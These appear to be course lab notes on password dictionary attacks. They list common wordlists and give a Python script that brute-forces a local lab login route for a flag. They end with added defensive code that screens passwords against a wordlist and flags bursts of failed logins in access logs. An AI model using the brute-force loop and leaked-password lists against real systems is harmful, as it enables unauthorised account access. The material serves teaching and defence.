# Introduction

- The effectiveness of a dictionary attack lies in its ability to exploit the human tendency to prioritize memorable passwords over secure ones
- Despite repeated warnings, many individuals continue to opt for passwords based on readily available information such as dictionary words, common phrases, names, or easily guessable patterns
- Predictability makes common words and phrases vulnerable to dictionary attacks, where attackers systematically test a pre-defined list of potential passwords against the target system

# Building and Using Wordlists

|Wordlist|Description|Typical Use|Source|
|---|---|---|---|
|`rockyou.txt`|A popular password wordlist containing millions of passwords leaked from the RockYou breach.|Commonly used for password brute force attacks.|[RockYou breach dataset](https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt)|
|`top-usernames-shortlist.txt`|A concise list of the most common usernames.|Suitable for quick brute force username attempts.|[SecLists](https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt)|
|`xato-net-10-million-usernames.txt`|A more extensive list of 10 million usernames.|Used for thorough username brute forcing.|[SecLists](https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames.txt)|
|`2023-200_most_used_passwords.txt`|A list of the 200 most commonly used passwords as of 2023.|Effective for targeting commonly reused passwords.|[SecLists](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/2023-200_most_used_passwords.txt)|
|`Default-Credentials/default-passwords.txt`|A list of default usernames and passwords commonly used in routers, software, and other devices.|Ideal for trying default credentials.|[SecLists](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.txt)|

- For example, imagine a web app creates a route (`/dictionary`) that handles POST requests
- The web app expects a `password` parameter in the request's form data
- Upon receiving a request, it compares the submitted password against the expected value
- If there's a match, it responds with a JSON object containing a success message and the flag
- Otherwise, it returns an error message with a 401 status code (Unauthorized)

```python
# dictionary-solver.py
import requests

ip = "127.0.0.1"  # Change this to your instance IP address
port = 1234       # Change this to your instance port number

# Download a list of common passwords from the web and split it into lines
passwords = requests.get("https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Passwords/Common-Credentials/500-worst-passwords.txt").text.splitlines()

# Try each password from the list
for password in passwords:
    print(f"Attempted password: {password}")

    # Send a POST request to the server with the password
    response = requests.post(f"http://{ip}:{port}/dictionary", data={'password': password})

    # Check if the server responds with success and contains the 'flag'
    if response.ok and 'flag' in response.json():
        print(f"Correct password found: {password}")
        print(f"Flag: {response.json()['flag']}")
        break
```

![[images/Pasted image 20251117201751.png]]
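The defender's side of the two points above, as an added example that is not part of the original notes or of the course material: the wordlists in the table are exactly what a registration form should screen new passwords against (after undoing the trivial variations users add to a dictionary word), and the loop in `dictionary-solver.py` leaves a burst of failed `POST /dictionary` requests in the web server's access log that a simple sliding-window rule can flag. The wordlist content, the access-log lines and the combined-log format they use are constructed samples; the `/dictionary` path and the 401 response come from the page.

```python
# Added defensive example (not the page's or the course's code).
#   screen_password()           rejects a user-chosen password that appears in a
#                               common-password wordlist after normalisation
#   detect_dictionary_bursts()  flags a source IP that sends >= threshold failed
#                               POSTs to the login route within a time window
# The wordlist and the log lines are constructed; real deployments would load
# rockyou.txt / SecLists and read the web server's actual access log.
from collections import defaultdict, deque
from datetime import datetime, timedelta
import re

# Constructed stand-in for a wordlist file such as 2023-200_most_used_passwords.txt
SAMPLE_WORDLIST = """password
123456
qwerty
letmein
summer2023
welcome
"""

# Undo the most common leet substitutions so "P@ssw0rd" is compared as "password"
LEET_TABLE = str.maketrans({"@": "a", "$": "s", "0": "o", "1": "i", "3": "e", "!": "i"})


def normalize(password: str) -> str:
    """Canonical form applied to BOTH the wordlist and the candidate:
    lowercase, trailing digits/symbols removed ("Summer2024!" -> "summer"),
    then leet characters mapped back to letters."""
    p = password.strip().lower()
    stem = re.sub(r"[\d\W_]+$", "", p)
    if not stem:            # all-digit / all-symbol passwords such as 123456
        return p
    return stem.translate(LEET_TABLE)


def load_denylist(wordlist_text: str) -> set:
    return {normalize(line) for line in wordlist_text.splitlines() if line.strip()}


def screen_password(candidate: str, denylist: set, min_length: int = 12) -> tuple:
    """Return (accepted, reason) for a password chosen at registration."""
    if len(candidate) < min_length:
        return False, "too short"
    if normalize(candidate) in denylist:
        return False, "matches common-password wordlist"
    return True, "ok"


# Assumed log format: Apache/nginx combined log, e.g.
# 10.0.0.5 - - [17/Nov/2025:20:17:51 +0000] "POST /dictionary HTTP/1.1" 401 43
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed access-log excerpt: one client hammering /dictionary, two bystanders
SAMPLE_ACCESS_LOG = [
    '10.0.0.9 - - [17/Nov/2025:20:17:50 +0000] "GET /login HTTP/1.1" 200 512',
    '10.0.0.5 - - [17/Nov/2025:20:17:51 +0000] "POST /dictionary HTTP/1.1" 401 43',
    '10.0.0.5 - - [17/Nov/2025:20:17:51 +0000] "POST /dictionary HTTP/1.1" 401 43',
    '10.0.0.5 - - [17/Nov/2025:20:17:52 +0000] "POST /dictionary HTTP/1.1" 401 43',
    '192.168.1.20 - - [17/Nov/2025:20:17:52 +0000] "POST /dictionary HTTP/1.1" 401 43',
    '10.0.0.5 - - [17/Nov/2025:20:17:52 +0000] "POST /dictionary HTTP/1.1" 401 43',
    '10.0.0.5 - - [17/Nov/2025:20:17:53 +0000] "POST /dictionary HTTP/1.1" 401 43',
    '10.0.0.5 - - [17/Nov/2025:20:17:53 +0000] "POST /dictionary HTTP/1.1" 200 61',
]


def detect_dictionary_bursts(log_lines, path="/dictionary", threshold=5,
                             window=timedelta(seconds=60)) -> dict:
    """Return {source_ip: ISO timestamp of the failure that crossed the threshold}
    for every client with >= threshold 401 responses to POST `path` inside `window`.
    Unparseable lines and requests to other routes are ignored."""
    recent = defaultdict(deque)   # per-IP timestamps of recent failures
    alerts = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if m["method"] != "POST" or m["path"] != path or m["status"] != "401":
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while q and ts - q[0] > window:   # drop failures outside the window
            q.popleft()
        if len(q) >= threshold and m["ip"] not in alerts:
            alerts[m["ip"]] = ts.isoformat()
    return alerts


if __name__ == "__main__":
    deny = load_denylist(SAMPLE_WORDLIST)
    for pw in ("P@ssw0rd123!", "Summer2024!!!", "correct horse battery staple"):
        print(pw, "->", screen_password(pw, deny))
    print("dictionary-attack sources:", detect_dictionary_bursts(SAMPLE_ACCESS_LOG))
```

Normalising both the wordlist and the candidate the same way is what makes the screen useful: `rockyou.txt` contains `password`, and a check that only does exact matching would wave through `P@ssw0rd123!`. The detector keys on the 401 that the route returns on a wrong guess; in production the same count would feed a per-IP or per-account rate limit rather than just a report.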